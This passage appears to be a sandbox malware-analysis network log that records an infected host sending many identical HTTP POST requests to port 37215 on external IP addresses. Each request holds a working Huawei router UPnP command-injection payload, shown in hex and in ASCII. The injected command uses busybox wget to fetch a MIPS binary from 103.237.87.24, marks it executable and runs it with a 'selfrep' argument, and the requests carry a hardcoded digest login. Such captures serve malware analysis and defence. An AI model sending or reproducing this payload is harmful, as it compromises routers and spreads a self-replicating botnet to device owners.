6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1809192.168.2.135769641.192.61.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544054031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1810192.168.2.135833241.92.169.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544056892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1811192.168.2.1352658153.240.16.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544126034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1812192.168.2.1352770197.164.209.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544142008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1813192.168.2.1335518179.21.199.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544147015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1814192.168.2.134025425.240.67.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544195890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1815192.168.2.1335380157.77.82.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544207096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1816192.168.2.1357372157.182.90.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544207096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1817192.168.2.1358260157.39.183.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544213057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1818192.168.2.1356796197.218.241.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544287920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1819192.168.2.134451065.39.92.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.544291019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
